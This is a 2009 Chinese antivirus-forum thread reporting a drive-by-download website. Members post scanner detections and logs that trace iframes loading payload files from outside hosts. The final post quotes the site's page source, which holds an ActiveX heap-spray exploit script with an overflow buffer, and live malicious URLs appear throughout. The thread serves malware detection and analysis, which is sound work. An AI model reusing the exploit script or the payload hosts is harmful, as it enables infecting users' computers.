查看: 2404|回复: 6
收起左侧

[其它] 火狐游戏网[挂马]

[复制链接]
dreams521
发表于 2009-1-22 00:51:34 | 显示全部楼层 |阅读模式
hxxp://go.keke02.cn/w04/new.html

[ 本帖最后由 dreams521 于 2009-1-22 00:57 编辑 ]
失翼天使
发表于 2009-1-22 07:32:13 | 显示全部楼层
畅游巡警扫描报告
扫描时间:2009年1月22日,7:31:13
畅游巡警网站扫描报告:

扫描时间:2009年1月22日,7:31:3

=============================

所在页面:    http://go.keke02.cn/gword.htm

所在页面的位置:    http://go.keke02.cn/w04/new.html

具体挂马地址:    http://go.keke02.cn/gword.htm

扫描结果:    Exploit.Win32.LianZhong.gen

=============================

所在页面:    http://go.keke02.cn/baozi.htm

所在页面的位置:    http://go.keke02.cn/w04/new.html

具体挂马地址:    http://go.keke02.cn/baozi.htm

扫描结果:    Trojan-Downloader.JS.Confusion.e

=============================

所在页面:    http://go.keke02.cn/w04/for.htm

所在页面的位置:    http://go.keke02.cn/w04/new.html

具体挂马地址:    http://go.keke02.cn/w04/for.htm

扫描结果:    Trojan-Downloader.JS.Confusion.g

=============================

所在页面:    http://go.keke02.cn/all10.htm

所在页面的位置:    http://go.keke02.cn/w04/new.html

具体挂马地址:    http://go.keke02.cn/all10.htm

扫描结果:    Exploit.Win32.Realplayer.gen
於陵闲云
发表于 2009-1-22 09:01:01 | 显示全部楼层
Log is generated by FreShow.
[wide]http://go.keke02.cn/w04/new.html
    [frame]http://go.keke02.cn/w04/for.htm
        [object]http://wwww.ttfabb.com/w04.css
    [frame]http://go.keke02.cn/w04/../baozi.htm
        [object]http://wwww.ttfafb.com/wl.css
    [frame]http://go.keke02.cn/w04/../gword.htm
        [script]http://go.keke02.cn/w04/../HOHOGL.js
            [object]http://wwww.ttfabb.com/wl.css
    [frame]http://go.keke02.cn/w04/../all10.htm
        [object]http://wwww.ttfabb.com/wl.css
    [frame]http://go.keke02.cn/w04/../all11.htm
        [script]http://go.keke02.cn/w04/../realdadong.js
            [object]http://wwww.ttfabb.com/wl.css
    [frame]http://go.keke02.cn/w04/fx.htm
        [frame]http://go.keke02.cn/w04/mlink.html
            [script]http://go.keke02.cn/w04/swfobject.js
        [frame]http://go.keke02.cn/w04/xlink.html
            [script]http://go.keke02.cn/w04/swfobject.js
    [frame]http://go.keke02.cn/w04/../supp.htm
        [object]http://wwww.ttfafb.com/wl.css

评分

参与人数 1经验 +1 收起 理由
aarwwefdds + 1 欢迎和鼓励学习解密

查看全部评分

seamonkey
发表于 2009-1-22 09:36:58 | 显示全部楼层
RIS 2009
访问地址:http://go.keke02.cn/supp.htm
访问网页的进程:"C:\Program Files\Internet Explorer\iexplore.exe"
病毒名称:Suspicious.Trojan-Downloader.Unescape.ShellCode.b
浪滔天
发表于 2009-1-22 21:45:40 | 显示全部楼层
卡8脚本启发

无法获取请求的网址

试图获取的网址(URL):

http://go.keke02.cn/w04/new.html

包含下列错误:

请求的对象已被感染下列病毒:
HEUR:Trojan-Downloader.Script.Generic


如果您对此有疑问,请与您的服务提供商进行联系。
发生于:
Thu Jan 22 21:43:57 2009
Kaspersky Internet Security 2009
qigang
发表于 2009-1-22 22:50:27 | 显示全部楼层
Log is generated by FreShow.
[wide]http://go.keke02.cn/w04/new.html
    [object]http://wwww.ttfabb.com/Baidu.cab
    [frame]http://go.keke02.cn/w04/for.htm
    [frame]http://go.keke02.cn/w04/../baozi.htm
    [frame]http://go.keke02.cn/w04/../gword.htm
    [frame]http://go.keke02.cn/w04/../all10.htm
    [frame]http://go.keke02.cn/w04/../all11.htm
    [frame]http://go.keke02.cn/w04/fx.htm
    [frame]http://go.keke02.cn/w04/../supp.htm
Kitman
发表于 2009-1-23 01:19:48 | 显示全部楼层

回复 3楼 於陵闲云 的帖子

想問這個怎解hxxp://go.keke02.cn/w04/../supp.htm
<html>
<script>window.onerror=function(){return true;}</script>
<script src=cx.js></script>
<object classid="clsi"+"d:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='pkpkhuoche'></object>
<SCRIPT language="javascript">
huochecodede=huoche16+huoche16+huoche0+huoche+huoche1+huoche2+huoche3+huoche4+huoche5+huoche6+huoche7+huoche8+huoche9+huoche10+huoche11+huoche12+huoche99+huoche13+huoche14+huoche15;
var pkblack = huoche16+huoche16;
var headhuoche = 20;
var r="r";
var rr="rr";
var pkjuhuoche = headhuoche+huochecodede.length;
while (pkblack.length<pkjuhuoche) pkblack+=pkblack;
fillhuoche = pkblack.substring(0, pkjuhuoche);
codejuhuoche = pkblack.substring(0, pkblack.length-pkjuhuoche);
while(codejuhuoche.length+pkjuhuoche<0x40000) codejuhuoche = codejuhuoche+codejuhuoche+fillhuoche;
modehuoche = new Array();
for (x=0; x<300; x++) modehuoche[x] = codejuhuoche + huochecodede;
var buffer = '';
while (buffer.length < 3092) buffer+="\x0a\x0a\x0a\x0a";
pkpkhuoche.LoadPage(buffer ,1 ,1 ,1);
</script>
</html>
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 10:42 , Processed in 0.125503 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表